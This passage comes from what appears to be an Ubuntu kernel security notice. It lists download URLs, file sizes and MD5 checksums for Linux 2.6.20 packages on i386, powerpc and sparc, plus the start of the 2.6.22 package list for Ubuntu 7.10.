fb3750e0c871ed295844c7f7241a4ce9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 8498 93fccc7acb7a937285bfdeeddd96622b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 49952 83e3c30159a350506cd5189d7bb1c26d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 51866 33d860b297ef1def33cbb0fa5172817b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 78850 741a82d5ea4e6091a635fe30be763753 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 79494 bd0edb4edd76da1b071b023150ddb576 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 322548 b71fab69e39da820f898cb1878ad35f8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 322570 a7e794cfb6161a5256dca794d7e40005 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 1362464 a9c294e1f39df7406b44849dada0005c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 1347982 bf23b61cec28934833d04a4679588fde http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 42452 1a310e8a7646046983275db34543e5db http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 42232 523af84ac476d47d9c4fea45d68212b8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 10762 b864a85e1495855ee8ff233509c6fb57 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 11398 8a45cdc34f8c06fac6e8e91326b2b376 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 55990 d19d09fd75f8dbce605ffe928d0d8e80 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 56896 89f449de196c1a118243ddda8b2ec461 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 360274 ee023deb6fa26448e428059797f13182 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 363220 c1a91e2211c228253b2af991c06ebc12 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 63168 a98ee6294093b94b35cae56af4bc589a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 63820 5f6dcc61b08427b55ac502e009474b7f http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb Size/MD5: 23844834 9e0480ccd5697b4722a9acc17674daf2 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb Size/MD5: 24185156 b5d8d7b87df6d9a22349a68294e6d726 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 328852 425e9ef86c7099ff211795eec55583f4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 325586 53f84ffdf949bd1b09c98f4d2d291f2c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 41182 f7dd000c829d8bcdd30623e21061c6d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 47456 3b397d1a8b2cc2bfcce9d083b8452e3c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 219678 9e8926372b9689927a497ec32fdd7826 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 239166 769515e2fc3aeb67ccfe62d709d3bed4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 43648 85bdebc413373cb792cb6db76825c726 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 39778 0f2244003a02e50f05cb36bf02e52da5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 717794 5af7c3eb55b152cff526b32c33531a20 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 776474 b6d3b6504853102e0c39b3dec975bf3e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 205058 549486bf0b0d3ec28a0af239f575b3ea http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 209732 44377dd629f1c1db23b68a46de9fa6d0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 59218 88eb3b3602340f8b621f7316b7619569 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 66860 e01835dfd217fc7404fb03f9b0eb3d9a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 64200 a0bfd643b213bd60bddf53c8929b3a8b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 65324 188f85a306b57e039077b25ea570ff33 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 144090 f199de239935cef855c54a7d028386a7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 162784 b1cb94d67312e7f004c020e411f175d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 383354 04eaff196f60e028c316e9ce098caba3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 251792 aac2012b70917ea7970e33de77b953f8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 2157578 bb7951f55026cbe40039195064571cb8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 3083390 ad3490bb8cbbaaaf453e2cfc68f2661f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb Size/MD5: 868072 e2f22f74e3636ff2c175bcc3bd1bcc8f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb Size/MD5: 871384 558640a6583bbac1c6f1ab65c0f39105 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb Size/MD5: 858544 78e49d6e412e0893ad05094beaed384c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_powerpc.deb Size/MD5: 8151204 8d3062db10aa3511fc031d8c0aa13c4a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb Size/MD5: 24516556 509dbee76838cb5036f3a94daef361bd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb Size/MD5: 26861066 06e9ce2eb22eb93eff787f79e2e04904 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb Size/MD5: 24219098 d032a4570f09e700a2d7be17406751a0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb Size/MD5: 2128044 61226c9ccefa59b36c64cb48d4ffbd8f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb Size/MD5: 2854452 f1e7c4af285f65c54c3f73b601aefbaa http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb Size/MD5: 2049692 c8c457931686087ceba6a31fc95e674c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_powerpc.deb Size/MD5: 644840 caf9acd0fd0b02a3b75faf9b17d4e6d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 253008 a541093402f366d45304517b4fd54389 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 295086 bb4855cec910c101c882fd9ed47b4b20 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 155546 a67279f494b6cc4e57d6f8699677b955 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 168438 68c42e64674977b49b7f063072facd64 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 248332 95f9d1233f3d12615d98de47887bd57c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 280138 fde4fda71bd171a8351363ea8648ed2a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 1110476 e36dff54046c10d7ea0810b8139c7217 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 1110650 3b8f5aec6dda991854dee9f9a10a4f08 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 1951192 26d78ce2216a97f212b30c098d3d83d6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 2253502 da1a4db59abfd92503867301db1f81e2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 233498 1630c711abe20e5514ce51d9c7ba430a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 223078 d3dbb9f6ecfa8b9ab6ac31a09b0d2d8a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 172916 df35f76be2c750777b771aa674ec9e9d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 205486 ad8055d1c3090d403cde4aaa99f8cbc8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 280980 61801d119336f98124f068e4e77e6f93 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 316590 b7893331e57856a0c9f65ad36b5e741d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 44648 934d68c57b2f6d80081b9594f30540be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 43408 f2f2a33061e8f1fc4af8293e8af96162 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 41210 bf293be5d7ac2b446a9e2e3057b3927d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 53682 1c744c28d973ea3a1d88bbe155418375 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 72810 2e746428b1426b81982339320b04cd85 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 85288 b6afcda94e97c363b427c3ffbe06492a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 74538 3ff2b4356cde14630a2fd95ca7426ab7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 29714 26b174cfc25f5659d919ef7e2c377ee5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 8396 94109c6ac7e606066b4097802318483f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 9876 600823c7c76e8a28f765174d1d4965a1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 56162 bd48637128ccdcf243949e1975d2eed4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 67416 1b1033a9dd03e2fda3a0eaae7d7d2a66 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 86634 1117abd9e041733cc146461886b6e664 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 129210 8d9f100997eca2ea53a3e9fad77edea4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 322556 e5a6a789a923b86878322b451934672a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 322582 7ba8b318656b01ef0ed96f97dabc7ac3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 1415798 5a7895fdfb2d740cfd55c8479d013d99 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 1345398 5558d96f73b123dd4a1ea4aa9cfb4ae2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 74222 5955d0dd72fb978d3e61b2d3cb60c0a7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 83240 4bb8920d4fd944fe61193a7c1cfb7b26 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 12012 52c2ae19ee5403334433fc23055b7762 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 13942 03d4dc8b53e82decb22409036515b3ce http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 78348 1eebba88e687b86b0480c127f198d016 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 85450 489205729e4c72ee92bd2d3c8582cd71 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 398164 ddddfc69b52ea32f28b60a5bda049f19 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 445180 96d05e932deeeb92ccc03031f76dc51f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb Size/MD5: 76712 220d1579023a0ff90a692bde2e2df73c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb Size/MD5: 100186 bfb2fc0e4ef1d3797e1d2c37d9e4f27e sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 53732 126e088e7705b7db76c3daed4b50d404 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 42158 a60d72f47f91f7c7110b44eced37ea47 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 211710 8038615e08a2bcbb4a8012e81f351077 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 607892 ae659c8a47bc0377e3d146d916952be9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 142706 a3aefa8400d6b2e9671490c728c1c442 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 51446 6c1fa11911f5260c32985c56f63bab9b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 37406 c20567b9297dd44eab21877f5b9a9091 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 151176 ee0be08527952eff3e2ed0a1c11f4e07 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 1933148 e57d2680d62d695e68f0787f6a8184d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb Size/MD5: 780450 b24e851d4751aafd89f96b6b6d945831 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb Size/MD5: 779240 cea2091e22942245018cce0d0a93328d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_sparc.deb Size/MD5: 8122088 5c0b0af602cca54f67d8e7edf84837d8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb Size/MD5: 16955662 769a2e70467b4d46f7ec22bf132e2bc0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb Size/MD5: 16601018 1d0f0ce0673f9ed315b65e28d859a84e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb Size/MD5: 2263822 b29af8e3f27ca93e0b4cb186c69b9215 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb Size/MD5: 2177986 e0e3f4e033e7e5b6146a093bc7cbf50a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_sparc.deb Size/MD5: 699974 3a1483cdf38fbb3b2e1ae5f227dfcc47 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 264340 9b68fe2b43a61fcb59f70795bbb58b9e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 156576 fa6d2dc5d481dd4799417062ed18034e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 241208 3ff9a7c4e6fe2c8374fb22fb423506ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 1110516 163e2c4fabab3ac148aee6b2256facb9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 1571854 1916d97e91e11ff7e9e15fd595a98e53 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 180416 3bf9c029d540091c5d64ac0e44d143be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 310078 e18dfca33751f59e7c6fcce65e097264 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 39664 cf204a862e9b29704e0b7841b7ca164c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 37986 fb9b30aa30f85d6d2619e9356521095f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 8646 7b952e82af185fe035a36231080954d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 59418 4bc0b24e2fe6443614a21cf0f96bbeea http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 90814 2960211b4dcbaa9a9c2d9a16cce38039 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 322562 9348c6750b654afd796a800975bcfb24 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 882354 d09d76538393c1717abe6e537ff82e41 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 9826 7a4c831d26fee041c618176e2ebd2dd4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 290222 46b0b52258fbd1afc668965c7bb54d30 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb Size/MD5: 54802 2bb011cc6d5cb65777c0c5a025697631 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.diff.gz Size/MD5: 3536108 c528a2740969db364c6eb9b1a77d688e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.dsc Size/MD5: 2262 c0868ac81f385b4eaefe240e95af4182 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz Size/MD5: 56913972 c98e1329975a8a7931ae63bafe39b63a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-14.51_all.deb Size/MD5: 4614486 3dfca0830ac21485b06c713f9581b92d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14_2.6.22-14.51_all.deb Size/MD5: 7776710 b8e3b1d8a257bc7ade3612f005334237 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-14.51_all.deb Size/MD5: 47680 8f4e80e38c3cf8604c94a0d501e3fda2 